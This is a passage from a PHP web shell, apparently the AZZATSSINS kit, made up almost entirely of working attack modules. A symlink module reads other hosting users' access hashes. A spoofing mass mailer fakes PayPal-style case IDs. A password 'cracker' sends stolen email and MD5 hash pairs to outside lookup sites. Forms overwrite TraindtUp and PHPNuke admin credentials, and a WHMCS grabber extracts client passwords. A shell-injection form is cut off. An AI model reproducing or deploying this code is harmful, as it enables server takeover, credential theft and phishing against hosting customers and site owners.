2614. <option title="home" value="home">home</option>
2615. <option title="home2" value="home2">home2</option>
2616. <option title="home3" value="home3">home3</option>
2617. <option title="home4" value="home4">home4</option>
2618. <option title="home5" value="home5">home5</option>
2619. <option title="home6" value="home6">home6</option>
2620. <option title="home7" value="home7">home7</option>
2621. <option title="home8" value="home8">home8</option>
2622. <option title="home9" value="home9">home9</option>
2623. <option title="home10" value="home10">home10</option>
2624. </select>&nbsp;&nbsp;&nbsp; [~] Htaccess :
2625. <select style="color:red;background-color:#000000" title="Select Software" name="soft" size="10">
2626. <option title="Apache" value="Options all
2627. Options +Indexes
2628. Options +FollowSymLinks
2629. DirectoryIndex Sux.html
2630. AddType text/plain .php
2631. AddHandler server-parsed .php
2632. AddType text/plain .html
2633. AddHandler txt .html
2634. Require None
2635. Satisfy Any">Apache</option>
2636. <option title="Litespeed" value="
2637. Options +FollowSymLinks
2638. DirectoryIndex seees.html
2639. RemoveHandler .php
2640. AddType application/octet-stream .php ">Litespeed</option>
2641.  
2642. </select> &nbsp;&nbsp; <input style="color:red;background-color:#000000" name="anu" size="10"
2643. value="<< &nbsp;START SCAN&nbsp; >>" type="submit">
2644. <br/><br/></form></center>
2645.  
2646. <?php
2647. @ini_set('html_errors',0);
2648. @ini_set('max_execution_time',0);
2649. @ini_set('display_errors', 0);
2650. @ini_set('file_uploads',1);
2651. if ($_POST['anu']) {
2652. $path = $_POST['path'];
2653. $home = $_POST['home'];
2654.  
2655. $functions=@ini_get("disable_functions");
2656. if(eregi("symlink",$functions))
2657. {
2658. die ('Kurang Ganteng Cok');
2659. }
2660. @mkdir(RESELLER, 0755);
2661. @chdir(RESELLER);
2662. $htaccess=$_POST['soft'];
2663. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
2664.  
2665. $passwd=explode("\n",$_POST["passwd"]); foreach($passwd as $pwd){
2666. $user=trim($pwd);
2667. @symlink('/'.$home.'/'.$user.'/public_html/moving.page/index.html',$user.' <~ RESELLER1');
2668. @symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER2');
2669. @symlink('/'.$home.'/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER3');
2670. @symlink('/'.$home.'/'.$user.'/.accesshash',$user.' <~ RESELLER4');
2671. }
2672. echo'<meta http-equiv="Refresh" content= "0; url=RESELLER"></body></html> ';
2673. }
2674. }
2675.  
2676.  
2677.  
2678. if($_GET['mas']=="mailer"){
2679. set_time_limit(intval($_POST['timelimit']));
2680. if (!function_exists('quoted_printable_encode')) {
2681. function quoted_printable_encode($input, $line_max = 75)
2682. {
2683. $hex = array('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');
2684. $lines = preg_split("/(?:\r\n|\r|\n)/", $input);
2685. $linebreak = "=0D=0A=\r\n";
2686. $line_max = $line_max - strlen($linebreak);
2687. $escape = "=";
2688. $output = "";
2689. $cur_conv_line = "";
2690. $length = 0;
2691. $whitespace_pos = 0;
2692. $addtl_chars = 0;
2693. for ($j = 0; $j < count($lines); $j++) {
2694. $line = $lines[$j];
2695. $linlen = strlen($line);
2696. for ($i = 0; $i < $linlen; $i++) {
2697. $c = substr($line, $i, 1);
2698. $dec = ord($c);
2699.  
2700. $length++;
2701.  
2702. if ($dec == 32) {
2703. if (($i == ($linlen - 1))) {
2704. $c = "=20";
2705. $length += 2;
2706. }
2707.  
2708. $addtl_chars = 0;
2709. $whitespace_pos = $i;
2710. } elseif (($dec == 61) || ($dec < 32) || ($dec > 126)) {
2711. $h2 = floor($dec / 16);
2712. $h1 = floor($dec % 16);
2713. $c = $escape . $hex["$h2"] . $hex["$h1"];
2714. $length += 2;
2715. $addtl_chars += 2;
2716. }
2717. if ($length >= $line_max) {
2718. $cur_conv_line .= $c;
2719. $whitesp_diff = $i - $whitespace_pos + $addtl_chars;
2720. if (($i + $addtl_chars) > $whitesp_diff) {
2721. $output .= substr($cur_conv_line, 0, (strlen($cur_conv_line) - $whitesp_diff)) . $linebreak;
2722. $i = $i - $whitesp_diff + $addtl_chars;
2723. } else {
2724. $output .= $cur_conv_line . $linebreak;
2725. }
2726. $cur_conv_line = "";
2727. $length = 0;
2728. $whitespace_pos = 0;
2729. } else {
2730. $cur_conv_line .= $c;
2731. }
2732. }
2733. $length = 0;
2734. $whitespace_pos = 0;
2735. $output .= $cur_conv_line;
2736. $cur_conv_line = "";
2737. if ($j <= count($lines) - 1) {
2738. $output .= $linebreak;
2739. }
2740. }
2741. return trim($output);
2742. }
2743. }
2744.  
2745. $action=$_POST['action'];
2746. $from=$_POST['from'];
2747. $subject=$_POST['subject'];
2748. $realname=$_POST['realname'];
2749. $replyto=$_POST['replyto'];
2750. $message=$_POST['message'];
2751. $emaillist=$_POST['emaillist'];
2752. $file_name=$_FILES['file']['name'];
2753. $contenttype=$_POST['contenttype'];
2754. $file=$_FILES['file']['tmp_name'];
2755. $amount=$_POST['amount'];
2756. $encode_text=$_POST['encode'];
2757.  
2758.  
2759. $message = urlencode($message);
2760. $message = ereg_replace("%5C%22", "%22", $message);
2761. $message = urldecode($message);
2762. $message = stripslashes($message);
2763. $subject = stripslashes($subject);
2764. if ($encode_text == "yes") {
2765. $subject = preg_replace('/([^a-z ])/ie', 'sprintf("=%02x",ord(StripSlashes("\\1")))', $subject);
2766. $subject = str_replace(' ', '_', $subject);
2767. $subject = "=?UTF-8?Q?$subject?=";
2768. $realname = preg_replace('/([^a-z ])/ie', 'sprintf("=%02x",ord(StripSlashes("\\1")))', $realname);
2769. $realname = str_replace(' ', '_', $realname);
2770. $realname = "=?UTF-8?Q?$realname?=";
2771. }
2772. ?>
2773. <form name="form1" method="post" action="" enctype="multipart/form-data">
2774. <table width="842" border="0">
2775. <tr>
2776.  
2777. <td width="95">
2778. <div align="right">
2779. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email:</font>
2780. </div>
2781. </td>
2782.  
2783. <td width="220">
2784. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
2785. <input type="text" name="from" placeholder="input your email sender" value="<?php print $from; ?>" size="30" />
2786. </font>
2787. </td>
2788.  
2789. <td width="238">
2790. <div align="right">
2791. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font>
2792. </div>
2793. </td>
2794.  
2795. <td width="271">
2796. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
2797. <input type="text" name="realname" placeholder="input your name sender" value="<?php $realname; ?>" size="30" />
2798. </font>
2799. </td>
2800. </tr>
2801. <tr>
2802. <td width="95">
2803. <div align="right">
2804. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font>
2805. </div>
2806. </td>
2807. <td width="220">
2808. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
2809. <input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />
2810. </font>
2811. </td>
2812. <td width="238">
2813. <div align="right">
2814. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font>
2815. </div>
2816. </td>
2817. <td width="271">
2818. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
2819. <input type="file" name="file" size="24" />
2820. </font>
2821. </td>
2822. </tr>
2823. <tr>
2824. <td width="95">
2825. <div align="right">
2826. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font>
2827. </div>
2828. </td>
2829. <td colspan="3">
2830. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
2831. <input type="text" name="subject" value="<?php $subject; ?>" size="90" />
2832. </font>
2833. </td>
2834. </tr>
2835. <td colspan="3" height="22" style="padding:10px;"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
2836.  
2837. &nbsp; <font color="#FF0000">Encode sending information ?</font> <select style="background:#EFFBF8;;border: 1px solid #01A9DB;color:#333" size="1" name="encode">
2838. <option <?php if($encode_text == "yes"){print "selected";} ?>>yes</option>
2839. <option <?php if($encode_text == "no"){print "selected";} ?>>no</option>
2840. </select></font></td>
2841. <tr valign="top">
2842. <td colspan="3">
2843. <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
2844. </td>
2845. <td width="271">
2846. <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email List :</font>
2847. </td>
2848. </tr>
2849. <tr valign="top">
2850. <td colspan="3">
2851. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
2852. <textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br /> <br />
2853. <input type="radio" name="contenttype" value="plain" /> Plain
2854. <input type="radio" name="contenttype" value="html"checked="checked" /> HTML
2855. <input type="hidden" name="action" value="send" /><br />
2856. Number to send: <input type="text" name="amount" value="1" size="10" /><br />
2857. Maximum script execution time (in seconds, 0 for no timelimit) <input type="text" name="timelimit" value="0" size="10" /><br /> <br />
2858. <input type="submit" value="Send Email" />
2859. </font>
2860. <p><div class="fb-like" data-href="https://www.facebook.com/AZZATSSINS.CYBERSERKERS" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div></p>
2861. </td>
2862. <td width="271">
2863. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
2864. <textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
2865. </font>
2866. </td>
2867. </tr>
2868. </table>
2869. </form><hr/>
2870. <center>
2871. <table style="width: 1024px;">
2872. <tr>
2873. <td style="width: 1024px;">
2874. <div style="overflow:auto; width:1024px; height: 470px; font-size: 11px; color:lime" >
2875. <?php
2876. if ($action == "send") {
2877. if (!$from && !$subject && !$message && !$emaillist) {
2878. echo "<script>alert('Please complete all the fields.'); </script>";
2879. exit;
2880. }
2881.  
2882. $allemails = split("\n", $emaillist);
2883. $numemails = count($allemails);
2884.  
2885. if ($file_name) {
2886. if (!file_exists($file)) {
2887. die("The file you are trying to upload could not be uploaded to the server");
2888. }
2889. $content = fread(fopen($file, "r"), filesize($file));
2890. $content = chunk_split(base64_encode($content));
2891. $uid = strtoupper(md5(uniqid(time())));
2892. $name = basename($file);
2893. }
2894.  
2895. for ($xx = 0; $xx < $amount; $xx++) {
2896.  
2897. for ($x = 0; $x < $numemails; $x++) {
2898. $to = $allemails[$x];
2899. if ($to) {
2900. $to = ereg_replace(" ", "", $to);
2901. $nrmail = $x + 1;
2902. $domain = substr($from, strpos($from, "@"), strlen($from));
2903. print "Sending $nrmail Email of $numemails to <font color=\"magenta\">$to</font> ==>";
2904. flush();
2905. $ranCaseID = ' (Case ID # PP-003-'.rand(111,999).'-'.rand(111,999).'-'.rand(111,999).')';
2906. $subject = str_replace('randomcase', $ranCaseID, $subject);
2907. $randfrom = rand();
2908. $fromrand = str_replace('random', $randfrom, $from);
2909. $header = "From: $realname <$fromrand>\r\nReply-To: $replyto\r\n";
2910. $header .= "Message-ID: <31337$numemails.$nrmail$domain>\r\n";
2911. $header .= "MIME-Version: 1.0\r\n";
2912. if ($file_name)
2913. $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
2914. if ($file_name)
2915. $header .= "--$uid\r\n";
2916. $header .= "Content-Type: text/$contenttype; charset=UTF-8\r\n";
2917. $header .= "Content-Transfer-Encoding: quoted-printable\r\n\r\n";
2918. $header .= quoted_printable_encode($message)."\r\n";
2919. if ($file_name)
2920. $header .= "--$uid\r\n";
2921. if ($file_name)
2922. $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
2923. if ($file_name)
2924. $header .= "Content-Transfer-Encoding: base64\r\n";
2925. if ($file_name)
2926. $header .= "$content\r\n";
2927. if ($file_name)
2928. $header .= "--$uid--";
2929. mail($to, $subject, "", $header);
2930. print "<font color=\"yellow\"> <i>Success!</i></font><br>";
2931. flush();
2932. }
2933. }
2934. }
2935.  
2936. }
2937. ?>
2938. </div>
2939. </td>
2940. </tr>
2941. </center>
2942. <p class="style2">&nbsp;</p>
2943. <p class="style1">&nbsp;</p>
2944. <?php
2945. if(isset($_POST['action']) && $numemails !==0 ){
2946. echo "<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); </script>";
2947. }
2948. ?>
2949. </body>
2950. </html>
2951. <?php }
2952.  
2953. if($_GET['md5']=="decrypter"){
2954. set_time_limit(0);
2955. ?>
2956. <script type="text/javascript" src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
2957. <script type="text/JavaScript">
2958. $(document).ready(function(){
2959. $('pre').fadeIn(3000);
2960.  
2961. $('input[type="text"]').click(function(){
2962. $(this).val('');
2963. });
2964.  
2965.  
2966.  
2967. });
2968.  
2969. </script>
2970.  
2971. <?
2972. if(!empty($_POST['password'])){
2973. set_time_limit(0);
2974. $password = nl2br($_POST['password']);
2975.  
2976. $ex = explode("<br />",$password);
2977.  
2978. $total_checked = 0;
2979. $total_cracked = 0;
2980. $total_failed = 0;
2981. $total_not_md5 = 0;
2982.  
2983. foreach($ex as $cracking_password){
2984. $total_checked++;
2985. $cracking_passwords = explode("|",$cracking_password);
2986. $cracking_password = explode("|",$cracking_password);
2987. $cracking_password = $cracking_password[1];
2988. echo $cracking_passwords[0]."|";
2989. $cracking_password = trim($cracking_password);
2990. $regex = "/[a-z0-9]{32}/i";
2991.  
2992. if(preg_match($regex,$cracking_password)){
2993. $curl_crack = curl_init();
2994.  
2995. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5online.net");
2996. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
2997. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"pass=".$cracking_password."&option=hash2text&send=Submit");
2998. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
2999. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
3000. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
3001. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
3002.  
3003.  
3004. $exec = curl_exec($curl_crack);
3005.  
3006.  
3007. if(preg_match("/pass : (.*)/",$exec,$cracked)){
3008. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font>";
3009. $total_cracked++;
3010. flush();
3011. }else{
3012.  
3013. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5decryption.com");
3014. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
3015. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&submit=Decrypt+It%21");
3016. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
3017. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
3018. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
3019. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
3020. $exec = curl_exec($curl_crack);
3021.  
3022.  
3023.  
3024. if(preg_match("/<font size=.*>(.+)<\/font>/",$exec,$cracked)){
3025. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
3026. $total_cracked++;
3027. flush();
3028. }else{
3029. $curl_crack = curl_init();
3030. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5pass.info");
3031. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
3032. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&get_pass=Get+Pass");
3033. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
3034. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
3035. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
3036. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
3037.  
3038.  
3039.  
3040. $exec = curl_exec($curl_crack);
3041.  
3042. if(preg_match("/Password - <b>(.*)<\/b>/",$exec,$cracked)){
3043. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
3044. $total_cracked++;
3045. flush();
3046. }else{
3047. $curl_crack = curl_init();
3048. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5.noisette.ch");
3049. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
3050. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password);
3051. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
3052. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
3053. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
3054. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
3055.  
3056.  
3057.  
3058. $exec = curl_exec($curl_crack);
3059.  
3060.  
3061.  
3062. if(preg_match('/= md5\("(.*)"\)/',$exec,$cracked)){
3063. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
3064. $total_cracked++;
3065. flush();
3066. }else{
3067.  
3068. echo "<font size='2' color='red'><b>Not Found</b></font><br />";
3069. $total_failed++;
3070. flush();
3071.  
3072. }// Next update put the fifth website here
3073.  
3074. }
3075. }
3076.  
3077.  
3078.  
3079.  
3080.  
3081.  
3082.  
3083.  
3084.  
3085.  
3086.  
3087.  
3088. }
3089. }
3090.  
3091. else{
3092. $total_not_md5++;
3093. echo $cracking_password."<br />";
3094. flush();
3095. continue;
3096. }
3097. //close curl //curl_close($curl_crack);
3098. }
3099.  
3100. echo "<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'><br><font size='2'>Total Password Checked : </font><b><font size='2'>".$total_checked."</font></b><br><font size='2' color='green'> Total Password Cracked : </font><font size='2'>".$total_cracked." </font><br><font size='2' color='red'> Total Password Faild : </font><b><font size='2'>".$total_failed."</font></b>"." </font><br><font size='2' color='orange'> Total Note Md5 : </font><b><font size='2'>".$total_not_md5."</font></b>";
3101. }else{
3102. ?>
3103. <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
3104. <center>
3105. <form method="POST">
3106.  
3107.  
3108. </textarea> <textarea cols='70' rows='15' name="password" placeholder="EMAIL|MD5"></textarea>
3109.  
3110. <br><br>
3111. <input type="submit" name="crack" value="Crack Password">
3112. <br>
3113. </form>
3114. </center>
3115. <?
3116. }}
3117.  
3118. if($_GET['traindt']=="login"){
3119. set_time_limit(0);
3120. echo "<html><head><title>TraindtUpLoginChanger</title></head>";
3121. echo "<body><center>
3122. <h2>AZZATSSINS</h2>
3123. <h3>TraindtUp UsEr-PaSs FuCk3r</h3>
3124. <form method=POST action=''>
3125. DB HOST<br/>
3126. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
3127. DB NAME<br/>
3128. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
3129. DB USER<br/>
3130. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
3131. DB PASSWORD<br/>
3132. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
3133. <hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
3134. <input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
3135. NEW ADMIN LOGIN USER<br/>
3136. <input value=admin-ganteng style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
3137. NEW ADMIN LOGIN PASS<br/>
3138. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
3139.  
3140. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
3141.  
3142. $anu1 = $_POST['anu1'];
3143. $anu2 = $_POST['anu2'];
3144. $anu3 = $_POST['anu3'];
3145. $anu4 = $_POST['anu4'];
3146. @mysql_connect($anu1,$anu3,$anu4);
3147. @mysql_select_db($anu2);
3148.  
3149. $idmaho=str_replace("\'","'",$idmaho);
3150. $target_id = $_POST['idmaho'];
3151.  
3152. $userbaru=str_replace("\'","'",$userbaru);
3153. $ganti_user = $_POST['userbaru'];
3154.  
3155. $passbaru=str_replace("\'","'",$passbaru);
3156. $hash_pass = $_POST['passbaru'];
3157. $ganti_pass = md5($hash_pass);
3158.  
3159. $sodok1 = "UPDATE admin SET admin_user ='".$ganti_user."' WHERE admin_id ='".$target_id."'";
3160. $sodok2 = "UPDATE admin SET admin_password ='".$ganti_pass."' WHERE admin_id ='".$target_id."'";
3161.  
3162. $oke=@mysql_query($sodok1);
3163. $oke=@mysql_query($sodok2);
3164. if($oke)
3165. {
3166. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
3167. }
3168. }
3169.  
3170. if($_GET['nuke']=="login"){
3171. set_time_limit(0);
3172. echo "<html><head><title>PHPNukeLoginChanger</title></head>";
3173. echo "<body><center>
3174. <h2>AZZATSSINS</h2>
3175. <h3>PHPNuke UsEr-PaSs FuCk3r</h3>
3176. <form method=POST action=''>
3177. DB HOST<br/>
3178. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
3179. DB NAME<br/>
3180. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
3181. DB USER<br/>
3182. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
3183. DB PASSWORD<br/>
3184. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
3185. <hr style='color:lime;'>
3186.  
3187. TARGET PREFIX<br/>
3188. <input style='color:lime;background-color:#000000' type=txt name=prefix size='20'><br/>
3189. NEW ADMIN LOGIN USER<br/>
3190. <input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
3191. NEW ADMIN LOGIN PASS<br/>
3192. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
3193.  
3194. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
3195.  
3196. $anu1 = $_POST['anu1'];
3197. $anu2 = $_POST['anu2'];
3198. $anu3 = $_POST['anu3'];
3199. $anu4 = $_POST['anu4'];
3200. @mysql_connect($anu1,$anu3,$anu4);
3201. @mysql_select_db($anu2);
3202.  
3203. $userbaru=str_replace("\'","'",$userbaru);
3204. $ganti_user = $_POST['userbaru'];
3205. $passbaru=str_replace("\'","'",$passbaru);
3206. $hash_pass = $_POST['passbaru'];
3207. $ganti_pass = md5($hash_pass);
3208.  
3209. $prefix = $_POST['prefix'];
3210. $table_name1 = $prefix."users" ;
3211. $table_name2 = $prefix."authors" ;
3212.  
3213. $okenuke1 = "UPDATE $table_name1 SET username ='".$ganti_user."' WHERE user_id ='2'";
3214. $okenuke2 = "UPDATE $table_name1 SET user_password ='".$ganti_pass."' WHERE user_id ='2'";
3215. $okenuke3= "UPDATE $table_name2 SET aid ='".$ganti_user."' WHERE radminsuper ='1'";
3216. $okenuke4 = "UPDATE $table_name2 SET pwd ='".$ganti_pass."' WHERE radminsuper ='1'";
3217.  
3218. $oke=@mysql_query($okenuke1);
3219. $oke=@mysql_query($okenuke2);
3220. $oke=@mysql_query($okenuke3);
3221. $oke=@mysql_query($okenuke4);
3222. if($oke)
3223. {
3224. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
3225. }
3226. }
3227.  
3228. if($_GET['ceck']=="whmcs"){
3229. set_time_limit(0);
3230. ?>
3231. <p><br/><body>
3232. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ CHECK WHMCS</span> <span class="b8">LICENSE & VERSION ]:=O</span></b></nobr><br/><br/>
3233. <p><form method="post">
3234. <table border=1>
3235. <tr><td>Hosting Site </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" value="http://" name="url"></td></tr>
3236. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr></table>
3237. <br></form></center>
3238.  
3239. <?php
3240. @error_reporting(0);
3241. @ini_set('log_errors',0);
3242. @ini_set('error_log',NULL);
3243. if(isset($_POST['plapon'])){
3244. $target = $_POST['url'];
3245. $bukadikitjoss = fopen("$target/?licensedebug","r");
3246. $hasil = '';
3247. while (!feof($bukadikitjoss)) {
3248. $hasil .= fread($bukadikitjoss, 8192);
3249. }
3250. echo "<center><textarea style='color:#FF0000;background-color:#000000' cols='40' rows='15'>$hasil</textarea>";
3251. }
3252. echo "</table>";
3253. }
3254.  
3255. if($_GET['whmcs']=="client"){
3256. set_time_limit(0);
3257. ?>
3258. <p><br/><body>
3259. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ GRAB PASSWORD</span> <span class="b8">CLIENT HOSTING ]:=O</span></b></nobr><br/><br/>
3260. <p><form method="post">
3261. <table border=1>
3262. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
3263. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
3264. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
3265. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
3266. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
3267.  
3268. </table>
3269. <br></form></center>
3270.  
3271. <?php
3272. if(isset($_POST['plapon'])) {
3273.  
3274. $perawan = $_POST['anu1'];
3275. $kimcil = $_POST['anu2'];
3276. $janda = $_POST['anu3'];
3277. $hotel = $_POST['anu4'];
3278. function get_string_between($string, $start, $end){
3279. $string = " ".$string;
3280. $ini = strpos($string,$start);
3281. if ($ini == 0) return "";
3282. $ini += strlen($start);
3283. $len = strpos($string,$end,$ini) - $ini;
3284. return substr($string,$ini,$len);
3285. }
3286. @mysql_connect($perawan,$kimcil,$janda);
3287. @mysql_select_db($hotel) or die ("Gagal Koneksi Ke Database");
3288. $query="select subject,message from tblemails";
3289. $result=mysql_query($query);
3290. mysql_close();
3291. $num=mysql_numrows($result);
3292. $i=0;
3293. while ($i < $num) {
3294. $css =mysql_result($result,$i,"subject");echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
3295. <tr><th colspan='7'> <span class='b7'>O=:[ HOST ROOT ]:=O</span> </th></tr><tr>
3296. <th align='center'><b>CLIENT EMAIL</b></th>
3297. <th align='center'><b>CLIENT PASSWORD</b></th>
3298. </tr>";
3299.  
3300.  
3301. if(stristr($css,"Welcome")){
3302. $s =mysql_result($result,$i,"message");
3303. if(stristr($s,"Login Username: ") or stristr($s,"Email Address: ")){
3304. $mail= get_string_between($s,"Login Username: ","<br />");
3305. $m2 = get_string_between($s,"Email Address: ","<br />");
3306. $pass = get_string_between($s,"Password: ","</p>");
3307. print $mail.$m2.":".$pass."<br>";
3308.  
3309. echo "<tr>
3310. <td align='center'>$mail.$m2.</td>
3311. <td align='center'>".$pass."</td>
3312. </tr>";
3313. }
3314. }
3315. ++$i;
3316. }
3317. }
3318. echo "</table>";
3319. }
3320.  
3321. if($_GET['whmcs']=="shell"){
3322. set_time_limit(0);
3323. ?>
3324. <p><br/><body>
3325. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ INJECT </span> <span class="b8">SHELL ]:=O</span></b></nobr><br/><br/>
3326. <p><form method="post">
3327. <table border=1>
3328. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
3329. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
3330. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
3331. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
3332. <tr><td align="center" colspan="2"> <textarea style='color:red;background-color:#000000' rows='10' cols='67'
